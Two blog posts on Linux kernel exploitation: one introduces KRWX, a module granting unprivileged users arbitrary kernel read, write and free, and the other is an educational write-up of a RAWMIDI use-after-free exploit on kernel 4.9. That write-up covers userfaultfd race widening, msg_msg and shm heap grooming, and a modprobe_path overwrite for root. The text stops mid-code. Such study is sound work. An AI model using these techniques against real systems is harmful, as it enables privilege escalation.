KRWX: Kernel Read Write Execute
Introduction
GitHub project: https://github.com/kiks7/KRWX
Over the last several months to a year I have been studying kernel exploitation, and along the way I developed a few tools that helped me (and still help me) better understand specific topics. Today I want to release my favourite one: KRWX (Kernel Read Write Execute). It is a simple LKM (Linux Kernel Module) that lets you play with kernel memory, and allocate and free kernel objects, directly from user-land!
What
The main goal of this tool is to use kernel functions from userland (from C code), in order to avoid slow kernel debugging and the development of kernel modules just to demonstrate specific vulnerabilities (instead, you can emulate them with the provided IOCTLs). It can also assist the exploitation phase.
These are the main features of the project (all of them are accessible to an unprivileged user from user-land):
- Read and write kernel memory
- Read entire blocks of memory
- Allocate arbitrary objects by calling kmalloc directly
- kfree arbitrary objects (and also free arbitrary addresses, if you want)
- Allocate/free multiple objects
- Log every copy_[from|to]_user/kmalloc/kfree called by the KRWX module through hooking (readable from dmesg).
Mainly, a more powerful read and write primitive :]
Why
Initially I wrote this module to study the SLUB memory allocator in Linux by allocating, freeing and re-allocating arbitrary chunks easily from a userland process. That naturally led me to study some exploitation techniques as well, which I found a lot easier to understand with this module, since you can play with kernel memory as if you were the god of your system. Then I started to use it heavily for multiple purposes, and that’s the reason why I’m sharing it.
How
These are some exported functions:
- void* kmalloc(size_t arg_size, gfp_t flags) -> Allocate a chunk with the specified size and flag options.
- int kfree(void* address) -> Free arbitrary chunks by their address (you can also free arbitrary memory).
- unsigned long int kread64(void* address) -> Read 8 bytes of memory at address.
- int kwrite64(void* address, uint64_t value) -> Write the 8 bytes specified by value to address.
- void read_memory(void* start_address, size_t size) -> Read size bytes of memory starting from start_address.
And, since one of my favourite hobbies is overengineering and I’m too lazy to write loops every time:
- void multiple_kmalloc(void** array, uint32_t n_objs, uint32_t size) -> Allocate n_objs objects of the specified size and return their addresses in array.
- void multiple_kfree(void** array, uint64_t to_free[], uint64_t to_free_size) -> Free the entries of array at the indexes listed in to_free (to_free_size is the number of elements in to_free).
If you’re interested in the source code, feel free to check out the GitHub project.
Examples
Allocate, free and read arbitrary chunks
You can find the full source code in example/01.c. Some snippets and a short walkthrough follow.
First, include the external library and call its initialization function (init_krwx):
#include "./lib/krwx.h"
int main(){
init_krwx();
[..]
}
Then, 10 chunks of size 256 are allocated using multiple_kmalloc, and the memory of the allocation at index 7 is read using read_memory after writing 0x4141414141414141 to its first 8 bytes:
void* chunks[10];
multiple_kmalloc(&chunks, 10, 256);
kwrite64(chunks[7], 0x4141414141414141);
read_memory(chunks[7], 0x10);
The indexes 3, 4 and 7 of the chunks array are freed using multiple_kfree:
uint64_t to_free[] = {3, 4, 7};
multiple_kfree(&chunks, &to_free, ( sizeof(to_free) / sizeof(uint64_t) ) );
Once they are freed, new chunks of the same size are allocated and initialized with 0x4343434343434343, and the memory of the freed chunk at index 7 is displayed using read_memory again:
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
read_memory(chunks[7], 0x10);
The result is:
[*] Allocating 10 chunks with size 256
[*] Allocated @0xffffffc00503b900
[*] Allocated @0xffffffc00503b600
[*] Allocated @0xffffffc00503b100
[*] Allocated @0xffffffc00503bc00
[*] Allocated @0xffffffc00503b400
[*] Allocated @0xffffffc00503b000
[*] Allocated @0xffffffc00503b500
[*] Allocated @0xffffffc00503b800
[*] Allocated @0xffffffc00503ba00
[*] Allocated @0xffffffc00503bd00
0xffffffc00503b800: 0x4141414141414141 0xffffffc0001a8928
[*] Freeing @0xffffffc00503bc00
[*] Freeing @0xffffffc00503b400
[*] Freeing @0xffffffc00503b800
0xffffffc00503b800: 0x4343434343434343 0xffffffc0001a8928
With a few lines of code we have demonstrated how the chunk at index 7 has been replaced with a new one after being freed (read_memory targeted chunks[7]).
As simple as it is, it has been written for demonstration purposes.
Use-After-Free
Simulating a UAF scenario takes just a few lines of code:
void* chunk = kmalloc(<SIZE>, <FLAGS>);
kfree(chunk);
// Allocate your target chunk
// Simulate UAF using k[write|read]64()
For example, if we want to simulate an attack scenario where we replace our vulnerable freed chunk with a target object (for example an iovec struct), we can allocate a chunk with kmalloc and later kfree it just before allocating the target structure:
// Allocate the vulnerable object
void* chunk = kmalloc(150, _GFP_KERN);
// Allocate target object
struct iovec iov[10] = {0};
char iov_buf[0x100];
iov[0].iov_base = iov_buf;
iov[0].iov_len = 0x1000;
iov[1].iov_base = iov_buf;
iov[1].iov_len = 0x1337;
int pp[2];
pipe(pp);
if(!fork()){
kfree(chunk); // Freeing the chunk just before allocating the iovec
readv(pp[0], iov, 10); // allocate iovec and blocks (keeping the object in the kernel)
exit(0);
}
sleep(1); // Give time to the child process
read_memory(chunk, 0x40);
Then, with read_memory we can display the block of memory we are interested in and, as you can see from the following output, our arbitrarily allocated and freed object has been replaced with the target object:
Allocated chunk @0xffffffc0052c5a00
0xffffffc0052c5a00: 0x0000007fd311ff58 0x0000000000001000
0xffffffc0052c5a10: 0x0000007fd311ff58 0x0000000000001337
0xffffffc0052c5a20: 0x0000000000000000 0x0000000000000000
0xffffffc0052c5a30: 0x0000000000000000 0x0000000000000000
Instead of just printing the content, you can simulate a UAF read/write using k[read|write]64 and play with it.
The full code of this example can be found in client/example/02.c
Setup
To compile the module, set the K variable in the Makefile to the root directory of your compiled kernel, build with make, then load the module with insmod.
Conclusions
Personally, I used it to study the SLUB allocator and to understand UAF, heap overflows, double frees, userfaultfd and some kernel hardening features, but it can assist the exploitation phase and more. Blog posts on some kernel vulnerabilities and their attack methodologies will follow in the coming months, and this module will come in handy to demonstrate them. So, stay tuned and enjoy!
PS. The “Execute” part of the name will be a future implementation to control pc/rip.
Linux Kernel Exploit Development: 1day case study
Introduction
I was searching for a vulnerability that would let me practise what I had recently learned about Linux kernel exploitation in a “real-life” scenario. Since I had a week at Hacktive Security to dedicate to deepening a specific topic, I decided to look for a public vulnerability without a public exploit and develop the exploit myself. After a quick introduction on how I found the known vulnerability, I will detail the exploitation of a race condition that leads to a Use-After-Free in Linux kernel 4.9.
TL;DR
This blog post has two parts:
- Vulnerability hunting: About public resources to identify known vulnerabilities in the Linux Kernel in order to practise some Kernel Exploitation in a real-life scenario. These resources include: BugZilla, SyzBot, changelogs and git logs.
- Kernel Exploitation: The vulnerability is a Race Condition that causes a write Use-After-Free. The race window has been extended using the userfaultfd technique (handling page faults from user-space); msg_msg has been used to leak a kernel address and I/O vectors to obtain a write primitive. With the write primitive, the modprobe_path global variable has been overwritten and a root shell popped.
Public bugs
The first thing I asked myself was: how do I find a suitable bug for my purpose? I ruled out searching by CVE, since not all vulnerabilities have an assigned CVE (usually only the most “famous” ones do), and that’s when I used the most powerful hacking skill: googling. That led me to various resources that I would like to share today, with the caveat that they are only the result of my personal research and may not reflect the best way to do the same job. That said, this is what I used to find my “matched” Nday:
- Bugzilla
- SyzBot
- Changelogs
- Git log
Kernel changelogs are definitely my favourite, but let’s say a few words about all of them.
BugZilla
BugZilla is the standard way to report bugs in the upstream Linux kernels. You can find interesting vulnerabilities organised by subsystem (e.g. Networking with IPv4 and IPv6, or file systems with the ext* types, and so on) and you can also search for keywords (such as “overflow”, “heap”, “UAF” and so on) using the standard search or the more advanced one. The downside, in my opinion, is that the results are mixed with a lot of “non vulnerabilities”, hangs and similar reports. Also, you do not have the most powerful search options (e.g. some bash). However, it is still a good option, and I personally pinned a few vulnerabilities there that I excluded afterwards.
Syzbot
“syzbot is a continuous fuzzing/reporting system based on syzkaller fuzzer” (Introducing the syzbot dashboard).
It does not have the best GUI, but at least it gives you a lot of potentially open and fixed vulnerabilities. There isn’t a built-in search option, but you can use your browser’s one or parse the HTML with an HTML parser. One of the downsides, beyond the lack of search, is the presence of tons of false positives (in the “Open” section). However, the upsides are pretty good: you can find open vulnerabilities (still not fixed), reproducers (C or syzlang) and fix commits, and reported issues follow the syzkaller nomenclature, which is pretty self-explanatory.
Syzkaller-bugs (Google Group)
The lack of a search functionality in syzbot is well compensated by the “syzkaller-bugs” Google Group, where you can find the bugs reported by syzbot together with additional information from the comment section and an enhanced search bar. I really enjoy this option!
Changelogs
That’s my favourite method: download all changelogs for your desired kernel version from the kernel CDN and enjoy the downloaded files with your favourite bash commands. This approach is similar to searching git commits but with the advantage that it is way faster. With some bash-fu, you can download all changelogs for a target kernel version (e.g. 4.x) with the following one-liner:
URL=https://cdn.kernel.org/pub/linux/kernel/v4.x/ && curl $URL | grep "ChangeLog-4.9" | grep -v '.sign' | cut -d "\"" -f 2 | while read line; do wget "$URL/$line"; done
Once all changelogs have been downloaded it’s possible to grep for juicy keywords like UAF, OOB, overflow and so on. I found it very useful to display the text before and after the matched keyword, like: grep -A5 -B5 UAF *. In that way, you instantly get quick information about vulnerability details, impacted subsystem, limitations and so on.
For each identified vulnerability, it’s possible to see its patch by diffing the patch commit with the previous one (the linux source from git is needed): git diff <commit before> <commit patch>.
Git log
As said before, this is a similar approach to the “Changelogs” method. The concept is pretty simple: clone the git repository and search for juicy keywords in the commit history. You can do that with the following commands:
git clone git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
cd linux-stable
git checkout -f <TAG> # e.g. git checkout -f v4.9.316 (from https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git)
git log > ../git.log
In that way, you can do the same thing as before on the git.log file. The big downside, however, is that the file is huge (11,429,573 lines on 4.9.316) and searching it takes more time. That’s the reason why I prefer the “Changelog” method.
Hunt for a good vulnerability
I was searching for a Use-After-Free vulnerability and I started looking for it in all the mentioned resources: BugZilla, SyzBot, changelogs and git history. I wrote the candidates down in a table with a short description in order to analyze them further later on. I started to dig into a few of them, viewing their patches and source code in order to understand reachability, compile-time dependencies and exploitability. I stumbled upon an interesting one: a vulnerability in the RAWMIDI interface (commit c13f1463d84b86bedb664e509838bef37e6ea317). I discovered it with the “Changelog” method, by searching for the “UAF” keyword and reading the previous and next five lines: grep -A5 -B5 UAF *. After looking at its behaviour, I was convinced to go with that vulnerability: a Use-After-Free triggered by a race condition.
RAWMIDI interface
Before facing the vulnerability, let’s see a few important things needed to follow this write-up. The vulnerable driver is exposed as a character device in /dev/snd/midiC0D* (or a similar name depending on the platform) and depends on CONFIG_SND_RAWMIDI. It exposes the following file operations:
// https://elixir.bootlin.com/linux/v4.9.224/source/sound/core/rawmidi.c#L1507
static const struct file_operations snd_rawmidi_f_ops =
{
.owner = THIS_MODULE,
.read = snd_rawmidi_read,
.write = snd_rawmidi_write,
.open = snd_rawmidi_open,
.release = snd_rawmidi_release,
.llseek = no_llseek,
.poll = snd_rawmidi_poll,
.unlocked_ioctl = snd_rawmidi_ioctl,
.compat_ioctl = snd_rawmidi_ioctl_compat,
};
The ones we are interested in are open, write and unlocked_ioctl.
open
The open (snd_rawmidi_open) operation allocates everything needed to interact with the device, but all we need to know is that it performs the first allocation of snd_rawmidi_runtime->buffer, with GFP_KERNEL and a size of 4096 (PAGE_SIZE) bytes. This is the snd_rawmidi_runtime struct:
struct snd_rawmidi_runtime {
struct snd_rawmidi_substream *substream;
unsigned int drain: 1, /* drain stage */
oss: 1; /* OSS compatible mode */
/* midi stream buffer */
unsigned char *buffer; /* buffer for MIDI data */
size_t buffer_size; /* size of buffer */
size_t appl_ptr; /* application pointer */
size_t hw_ptr; /* hardware pointer */
size_t avail_min; /* min avail for wakeup */
size_t avail; /* max used buffer for wakeup */
size_t xruns; /* over/underruns counter */
/* misc */
spinlock_t lock;
wait_queue_head_t sleep;
/* event handler (new bytes, input only) */
void (*event)(struct snd_rawmidi_substream *substream);
/* defers calls to event [input] or ops->trigger [output] */
struct work_struct event_work;
/* private data */
void *private_data;
void (*private_free)(struct snd_rawmidi_substream *substream);
};
write
Once everything has been allocated by the open operation, we can write into the file descriptor with a call like write(fd, &buf, 10). That copies 10 bytes into snd_rawmidi_runtime->buffer, and snd_rawmidi_runtime->appl_ptr remembers the offset from which the next write will continue.
In order to write into that buffer, the driver does the following calls: snd_rawmidi_write => snd_rawmidi_kernel_write1 => copy_from_user
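To make the role of appl_ptr more concrete, here is a small user-space model of the chunked copy loop, sketched from the loop header visible in the patch context later in this post. The struct and function names (ring_model, ring_model_write) are hypothetical, memcpy stands in for copy_from_user, and locking is left out entirely, so treat it as an illustration of the bookkeeping rather than the driver's code.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical user-space stand-in for the fields of snd_rawmidi_runtime
 * that matter for a write: the buffer, its size, the write offset and the
 * number of free bytes. */
struct ring_model {
    unsigned char *buffer;
    size_t buffer_size;
    size_t appl_ptr;   /* offset where the next write starts */
    size_t avail;      /* free bytes left in the buffer */
};

/* Copy up to count bytes from src into the ring, in chunks that never run
 * past the end of the buffer. Returns the number of bytes written. */
long ring_model_write(struct ring_model *rt, const unsigned char *src, long count)
{
    long result = 0;

    while (count > 0 && rt->avail > 0) {
        long count1 = (long)(rt->buffer_size - rt->appl_ptr);
        if (count1 > count)
            count1 = count;
        if (count1 > (long)rt->avail)
            count1 = (long)rt->avail;

        /* In the driver this is the copy_from_user() call. */
        memcpy(rt->buffer + rt->appl_ptr, src + result, (size_t)count1);

        rt->appl_ptr = (rt->appl_ptr + (size_t)count1) % rt->buffer_size;
        rt->avail -= (size_t)count1;
        result += count1;
        count -= count1;
    }
    return result;
}
```

With a 16-byte buffer, a first 10-byte write leaves appl_ptr at 10, and a second 10-byte write only stores the 6 bytes that still fit.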
ioctl
snd_rawmidi_ioctl is responsible for handling IOCTL commands, and the one we are interested in is SNDRV_RAWMIDI_IOCTL_PARAMS, which calls snd_rawmidi_output_params with user-controllable parameters:
int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
struct snd_rawmidi_params * params)
{
// [..] few checks
if (params->buffer_size != runtime->buffer_size) {
newbuf = kmalloc(params->buffer_size, GFP_KERNEL); //[1]
if (!newbuf)
return -ENOMEM;
spin_lock_irq(&runtime->lock);
oldbuf = runtime->buffer;
runtime->buffer = newbuf; // [2]
runtime->buffer_size = params->buffer_size;
runtime->avail = runtime->buffer_size;
runtime->appl_ptr = runtime->hw_ptr = 0;
spin_unlock_irq(&runtime->lock);
kfree(oldbuf); //[3]
}
// [..]
}
This IOCTL is crucial for this vulnerability. With this command it’s possible to re-size the internal buffer to an arbitrary size: a new buffer is allocated [1] and installed in place of the old one [2], and the old buffer is then freed [3].
Vulnerability Analysis
The vulnerability has been patched by the commit “c13f1463d84b86bedb664e509838bef37e6ea317”, which introduced a reference counter on the vulnerable buffer. In order to understand where the vulnerability lived, it’s a good idea to look at its patch:
diff --git a/include/sound/rawmidi.h b/include/sound/rawmidi.h
index 5432111c8761..2a87128b3075 100644
--- a/include/sound/rawmidi.h
+++ b/include/sound/rawmidi.h
@@ -76,6 +76,7 @@ struct snd_rawmidi_runtime {
size_t avail_min; /* min avail for wakeup */
size_t avail; /* max used buffer for wakeup */
size_t xruns; /* over/underruns counter */
+ int buffer_ref; /* buffer reference count */
/* misc */
spinlock_t lock;
wait_queue_head_t sleep;
diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 358b6efbd6aa..481c1ad1db57 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -108,6 +108,17 @@ static void snd_rawmidi_input_event_work(struct work_struct *work)
runtime->event(runtime->substream);
}
+/* buffer refcount management: call with runtime->lock held */
+static inline void snd_rawmidi_buffer_ref(struct snd_rawmidi_runtime *runtime)
+{
+ runtime->buffer_ref++;
+}
+
+static inline void snd_rawmidi_buffer_unref(struct snd_rawmidi_runtime *runtime)
+{
+ runtime->buffer_ref--;
+}
+
static int snd_rawmidi_runtime_create(struct snd_rawmidi_substream *substream)
{
struct snd_rawmidi_runtime *runtime;
@@ -654,6 +665,11 @@ int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
if (!newbuf)
return -ENOMEM;
spin_lock_irq(&runtime->lock);
+ if (runtime->buffer_ref) {
+ spin_unlock_irq(&runtime->lock);
+ kfree(newbuf);
+ return -EBUSY;
+ }
oldbuf = runtime->buffer;
runtime->buffer = newbuf;
runtime->buffer_size = params->buffer_size;
@@ -962,8 +978,10 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
long result = 0, count1;
struct snd_rawmidi_runtime *runtime = substream->runtime;
unsigned long appl_ptr;
+ int err = 0;
spin_lock_irqsave(&runtime->lock, flags);
+ snd_rawmidi_buffer_ref(runtime);
while (count > 0 && runtime->avail) {
count1 = runtime->buffer_size - runtime->appl_ptr;
if (count1 > count)
@@ -982,16 +1000,19 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
if (userbuf) {
spin_unlock_irqrestore(&runtime->lock, flags);
if (copy_to_user(userbuf + result,
- runtime->buffer + appl_ptr, count1)) {
- return result > 0 ? result : -EFAULT;
- }
+ runtime->buffer + appl_ptr, count1))
+ err = -EFAULT;
spin_lock_irqsave(&runtime->lock, flags);
+ if (err)
+ goto out;
}
result += count1;
count -= count1;
}
+ out:
+ snd_rawmidi_buffer_unref(runtime);
spin_unlock_irqrestore(&runtime->lock, flags);
- return result;
+ return result > 0 ? result : err;
}
long snd_rawmidi_kernel_read(struct snd_rawmidi_substream *substream,
@@ -1262,6 +1283,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
return -EAGAIN;
}
}
+ snd_rawmidi_buffer_ref(runtime);
while (count > 0 && runtime->avail > 0) {
count1 = runtime->buffer_size - runtime->appl_ptr;
if (count1 > count)
@@ -1293,6 +1315,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
}
__end:
count1 = runtime->avail < runtime->buffer_size;
+ snd_rawmidi_buffer_unref(runtime);
Two functions were added: snd_rawmidi_buffer_ref and snd_rawmidi_buffer_unref. They respectively take and release a reference to the buffer, tracked in snd_rawmidi_runtime->buffer_ref, while the driver is copying from (snd_rawmidi_kernel_read1) or writing into (snd_rawmidi_kernel_write1) that buffer. But why was this needed? Because the read and write operations handled by snd_rawmidi_kernel_read1 and snd_rawmidi_kernel_write1 temporarily release the runtime lock while copying from/to userspace, using spin_unlock_irqrestore [1] and spin_lock_irqsave [2], which gives a small race window where the object can be modified during the copy_from_user call:
static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream, const unsigned char __user *userbuf, const unsigned char *kernelbuf, long count) {
// [..]
spin_unlock_irqrestore(&runtime->lock, flags); // [1]
if (copy_from_user(runtime->buffer + appl_ptr,
userbuf + result, count1)) {
spin_lock_irqsave(&runtime->lock, flags);
result = result > 0 ? result : -EFAULT;
goto __end;
}
spin_lock_irqsave(&runtime->lock, flags); // [2]
// [..]
}
If a concurrent thread re-allocates runtime->buffer using the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl, that thread can take the lock with spin_lock_irq [1] (the lock is left released during the small race window in snd_rawmidi_kernel_write1) and free that buffer [2], making it possible to allocate an arbitrary object in its place and write to it. Also, the kmalloc [3] in snd_rawmidi_output_params is called with params->buffer_size, which is fully user controllable.
int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
struct snd_rawmidi_params * params)
{
// [..]
if (params->buffer_size != runtime->buffer_size) {
newbuf = kmalloc(params->buffer_size, GFP_KERNEL); // [3]
if (!newbuf)
return -ENOMEM;
spin_lock_irq(&runtime->lock); // [1]
oldbuf = runtime->buffer;
runtime->buffer = newbuf;
runtime->buffer_size = params->buffer_size;
runtime->avail = runtime->buffer_size;
runtime->appl_ptr = runtime->hw_ptr = 0;
spin_unlock_irq(&runtime->lock);
kfree(oldbuf); // [2]
}
// [..]
}
What happens if, while a thread is writing into the buffer with copy_from_user, another thread frees that buffer using the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl and a new arbitrary object is allocated in its place? The buffer is replaced with a new object and copy_from_user continues writing into that other object (the “victim object”), corrupting its values => Use-After-Free (Write).
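The reference counter introduced by the patch can be modeled in user space to see why it closes the window. The following is only a single-threaded sketch: the names (runtime_model, model_resize and so on) are hypothetical, malloc/free stand in for kmalloc/kfree, and the spinlock that protects these fields in the driver is omitted.

```c
#include <errno.h>
#include <stdlib.h>

/* Hypothetical user-space stand-in for the relevant runtime fields. */
struct runtime_model {
    unsigned char *buffer;
    size_t buffer_size;
    int buffer_ref;          /* non-zero while a copy is in flight */
};

/* Taken before the lock is dropped around the user copy. */
void model_buffer_ref(struct runtime_model *rt)   { rt->buffer_ref++; }

/* Released once the copy is done and the lock is held again. */
void model_buffer_unref(struct runtime_model *rt) { rt->buffer_ref--; }

/* Mirrors the patched resize path: refuse to swap (and free) the buffer
 * while a reader or writer still holds a reference to it. */
int model_resize(struct runtime_model *rt, size_t new_size)
{
    unsigned char *newbuf, *oldbuf;

    if (new_size == rt->buffer_size)
        return 0;

    newbuf = malloc(new_size);
    if (!newbuf)
        return -ENOMEM;

    if (rt->buffer_ref) {        /* a copy is in progress: back off */
        free(newbuf);
        return -EBUSY;
    }

    oldbuf = rt->buffer;
    rt->buffer = newbuf;
    rt->buffer_size = new_size;
    free(oldbuf);
    return 0;
}
```

While a reference is held, model_resize returns -EBUSY and leaves the old buffer in place, so an in-flight copy never ends up pointing at freed memory.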
The really good part about this vulnerability is the “freedom” you can have:
- It’s possible to call kmalloc with an arbitrary size (and this will be the freed object that we are going to replace to cause a UAF), which means that we can target our favourite slab cache (based on what we need, ofc)
- We can write as much as we want into the buffer with the write syscall
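Since the requested size decides which slab cache is targeted, a tiny helper that maps a size to its general-purpose cache can be handy when planning. This is a sketch under the assumption of the usual kmalloc size classes on x86_64 (8 up to 8192, including the 96 and 192 caches); the function name is hypothetical and other configurations may differ.

```c
#include <stddef.h>

/* Returns the object size of the kmalloc-N cache that would serve a request
 * of `size` bytes, assuming the usual general-purpose size classes.
 * Returns 0 for a zero-sized request or one larger than the biggest class
 * modeled here. */
size_t kmalloc_cache_size(size_t size)
{
    static const size_t classes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    size_t i;

    if (size == 0)
        return 0;

    for (i = 0; i < sizeof(classes) / sizeof(classes[0]); i++) {
        if (size <= classes[i])
            return classes[i];
    }
    return 0;
}
```

For the sizes used in this post, a 30-byte request maps to kmalloc-32, 144 bytes to kmalloc-192 and 208 bytes to kmalloc-256.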
Extend the Race Time Window
We know we have a small race window of a few instructions while data is copied from userland to the kernel, as explained before, but the great news is that the copy_from_user can be suspended for an arbitrary amount of time by handling the page fault in user-space! I was exploiting the vulnerability on a 4.9 kernel (4.9.223), where userfaultfd is still available to unprivileged users (it is restricted by default only from 5.11 onward), so we can use it to extend our race window and get the time needed to re-allocate a buffer!
Exploitation Plan
We stated that we are going to use the userfaultfd technique to extend the time window. If you are new to this technique, it is well explained here, in this video (you can use subtitles) and here. To summarize: you can handle page faults from user-land, temporarily blocking kernel execution while the page fault is being handled. If we mmap a block of memory with the MAP_ANONYMOUS flag, the memory will be demand-zero paged, meaning that it is not backed by physical pages until first access, and we can serve that first access via userfaultfd.
The idea using this technique is:
- Initialize runtime->buffer with open => This allocates the buffer with a size of 4096 bytes (it will land in kmalloc-4096)
- Send the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl command to re-allocate the buffer with our desired size (e.g. 30 will land in kmalloc-32)
- Allocate a demand-zero paged (MAP_ANON) region with mmap and initialize userfaultfd to handle its page faults
- write to the rawmidi file descriptor using the previously mmapped memory => This triggers the userland page fault in copy_from_user
- While the kernel thread is suspended waiting for the userland page fault, send SNDRV_RAWMIDI_IOCTL_PARAMS again to free the current runtime->buffer
- Allocate an object in, for example, kmalloc-32; if we sprayed that cache beforehand, it will take the place of the previously freed runtime->buffer
- Release the page fault from userland; copy_from_user will continue writing its data (fully under our control) into the newly allocated object
With this primitive, we can forge arbitrary objects with arbitrary size (specified in the write syscall), arbitrary content, arbitrary offset (since we can trigger userfaultfd between two pages, as demonstrated later on) and in an arbitrary cache (we control the allocation size in the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl).
As you can deduce, we have a really great and powerful primitive!
Information Leak
Victim Object
We are going to use what we explained in the “Exploitation Plan” section to leak an address that we will re-use to obtain an arbitrary write. Since we can choose which cache to trigger the UAF on (and that’s gold from an exploitation point of view), I chose to leak the shm_file_data->ns pointer, which points to init_ipc_ns in the kernel .data section; shm_file_data lives in kmalloc-32 (I also used the same function to spray the kmalloc-32 cache):
void alloc_shm(int i)
{
int shmid[0x100] = {0};
void *shmaddr[0x100] = {0};
shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);
if (shmid[i] < 0) errExit("shmget");
shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);
if (shmaddr[i] == (void *)-1) errExit("shmat"); // shmat() returns (void *)-1 on failure
}
alloc_shm(1);
From that pointer, we will deduce the address of modprobe_path in order to use that technique later to elevate our privileges.
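Deducing one symbol from another is plain pointer arithmetic: both symbols live in the same kernel image, so the distance between them is fixed for a given build. A minimal sketch follows; the function name is hypothetical, and the static addresses in the usage note are made-up placeholders, not values from the kernel used in this post (real ones would come from that build's symbol table).

```c
#include <stdint.h>

/* Given the runtime address of a leaked symbol and the static (link-time)
 * addresses of both the leaked symbol and the target symbol, return the
 * runtime address of the target symbol. */
uint64_t rebase_symbol(uint64_t leaked_runtime_addr,
                       uint64_t leaked_static_addr,
                       uint64_t target_static_addr)
{
    /* slide = runtime - static; it is 0 when the image is not relocated */
    uint64_t slide = leaked_runtime_addr - leaked_static_addr;
    return target_static_addr + slide;
}
```

For instance, with placeholder static addresses 0xffffffff81e8d560 (init_ipc_ns) and 0xffffffff81e42a00 (modprobe_path), a leaked value of 0xffffffff9de8d560 would yield 0xffffffff9de42a00.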
msg_msg
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};
In order to leak that address, however, we have to corrupt some other object in kmalloc-32, ideally one with a length field that lets us read past the end of its own object. For that purpose, msg_msg is a perfect match because it has a length field (msg_msg->m_ts) and it can be allocated in almost any cache from kmalloc-32 to kmalloc-4096, with just one downside: the minimum allocation for the msg_msg struct is 48 bytes (sizeof(struct msg_msg)), so the msg_msg object itself lands in kmalloc-64 at minimum.
If you want to read more about this structure you can check out the Fire of Salvation Writeup, Wall Of Perdition and the kernel source code.
However, when a message is sent using msgsnd with a size greater than DATALEN_MSG ((size_t)PAGE_SIZE - sizeof(struct msg_msg)), that is 4096 - 48, a segment (or multiple segments if needed) is allocated, and the message is split between the msg_msg (the payload follows right after the struct header) and the msg_msgseg, with the total size of the message stored in msg_msg->m_ts.
In order to allocate our target object in kmalloc-32 we have to send a message with size: ( ( 4096 - 48 ) + 10 ).
- The msg_msg structure will be allocated in kmalloc-4096 and the first (4096 - 48) bytes will be written in the msg_msg structure.
- To allocate the remaining 10 bytes, a msg_msgseg segment will be allocated in kmalloc-32
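The split described above can be checked with a few lines of arithmetic. The sketch below assumes a 4096-byte page, the 48-byte msg_msg header stated in the text and an 8-byte msg_msgseg header (a single pointer on 64-bit); the struct and function names are hypothetical.

```c
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096u
#define MODEL_MSG_HDR   48u  /* sizeof(struct msg_msg), as stated in the text */
#define MODEL_SEG_HDR   8u   /* sizeof(struct msg_msgseg): one pointer, 64-bit */

struct msg_layout {
    size_t head_alloc;      /* bytes requested for msg_msg + inline payload */
    size_t n_segs;          /* number of msg_msgseg segments */
    size_t last_seg_alloc;  /* bytes requested for the last segment, 0 if none */
};

/* Compute how a message of `len` payload bytes is spread over the msg_msg
 * allocation and its segments. */
struct msg_layout msg_layout_for(size_t len)
{
    struct msg_layout l = {0, 0, 0};
    const size_t datalen_msg = MODEL_PAGE_SIZE - MODEL_MSG_HDR;
    const size_t datalen_seg = MODEL_PAGE_SIZE - MODEL_SEG_HDR;
    size_t chunk = len < datalen_msg ? len : datalen_msg;

    l.head_alloc = MODEL_MSG_HDR + chunk;
    len -= chunk;

    while (len > 0) {
        chunk = len < datalen_seg ? len : datalen_seg;
        l.n_segs++;
        l.last_seg_alloc = MODEL_SEG_HDR + chunk;
        len -= chunk;
    }
    return l;
}
```

For a payload of (4096 - 48) + 10 bytes this gives a 4096-byte head allocation and a single 18-byte segment, which is served from kmalloc-32.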
With these conditions, we can forge the msg_msg structure in kmalloc-4096, overwriting its m_ts value with our UAF, and with msgrcv we can receive a message that contains values past our segment allocated in kmalloc-32 (including our targeted init_ipc_ns pointer).
Dealing with offsets
However, we want to overwrite the m_ts value without overwriting anything else in the msg_msg structure. How can we do that?
If you remember, I said we can overwrite chunks with arbitrary size, content and offset. If we mmap a region of PAGE_SIZE * 2 (two pages) and handle the page fault only for the second page, we can start writing into the original runtime->buffer and trigger the page fault when the copy reaches the msg_msg->m_ts offset (0x18). Now that the kernel thread is blocked, it’s possible to replace the object with msg_msg, and when copy_from_user resumes it writes the remaining bytes exactly at msg_msg->m_ts. The size we write into the file descriptor is (0x18 + 0x2): the first 0x18 bytes are used to land at the exact offset and the remaining 2 bytes write 0xffff into msg_msg->m_ts. The concept is also explained in the following picture:

Now, from the message received with msgrcv we can retrieve the init_ipc_ns pointer stored in shm_file_data, deduce the modprobe_path address by calculating its offset, and proceed with the arbitrary write phase.
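The two-page trick from "Dealing with offsets" boils down to choosing where, inside the first page, the user buffer starts, so that exactly the wanted number of bytes sits before the page boundary. A small sketch of that arithmetic, assuming 4096-byte pages and hypothetical function names:

```c
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096u

/* Offset inside a two-page mapping at which the source buffer should start
 * so that exactly `prefix_len` bytes are read from the first (already
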